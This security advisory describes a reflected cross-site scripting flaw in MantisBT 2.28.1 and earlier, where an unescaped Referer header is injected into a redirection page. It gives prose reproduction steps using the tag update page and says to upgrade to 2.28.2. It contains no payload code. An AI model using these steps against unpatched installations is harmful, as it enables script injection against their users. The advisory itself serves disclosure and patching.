Mantis Bug Tracker Cross-Site Scripting Vulnerability via Improper HTML Escaping

A cross-site scripting (XSS) vulnerability has been identified in Mantis Bug Tracker (MantisBT) versions 2.28.1 and prior. The issue arises from improper escaping of the redirection page, which is sourced from the request's Referer header. This flaw allows an attacker to inject HTML. While modern browsers typically URL-encode special characters, certain server configurations could lead to cache poisoning, making this injection exploitable as a reflected XSS vulnerability.

Impact

Exploitation of this vulnerability allows for cross-site scripting, where injected HTML is executed in the context of the user's browser.

Reproduction

To reproduce this vulnerability, log in as an administrator and navigate to the tag update page. Create a new tag if none exists. Then, send a request to the tag update page with a crafted Referer header that includes unencoded HTML. The injected HTML will be reflected on the page, demonstrating the vulnerability.

Remediation

Users can upgrade to MantisBT version 2.28.2 or later, where this vulnerability has been fixed.